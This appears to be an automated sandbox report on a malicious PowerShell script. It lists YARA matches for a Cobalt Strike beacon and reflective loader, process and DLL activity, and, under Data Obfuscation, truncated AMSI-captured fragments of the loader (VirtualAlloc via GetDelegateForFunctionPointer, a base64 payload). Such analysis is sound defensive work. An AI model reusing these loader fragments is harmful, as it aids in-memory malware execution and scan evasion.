                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal100.troj.evad.winPS1@2/5@0/1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED340B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_000001A6ED340B70
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED343A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_000001A6ED343A64
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31gyipb.z3t.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: oEFrY6Xcyl.ps1ReversingLabs: Detection: 65%
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((test kernel32.dll VirtualAlloc), (test2 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED360198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,0_2_000001A6ED360198
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED31776C push 0000006Ah; retf 0_2_000001A6ED317784
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED36916C push 0000006Ah; retf 0_2_000001A6ED369184
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34792E25 pushad ; iretd 0_2_00007FFD34792E91
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34792E45 pushad ; iretd 0_2_00007FFD34792E91
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3479A26C push esp; retf 0_2_00007FFD3479A26D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34795BB8 pushad ; iretd 0_2_00007FFD34795BB9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34860565 push edi; retf 0_2_00007FFD34860566
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3501A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000001A6ED3501A8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
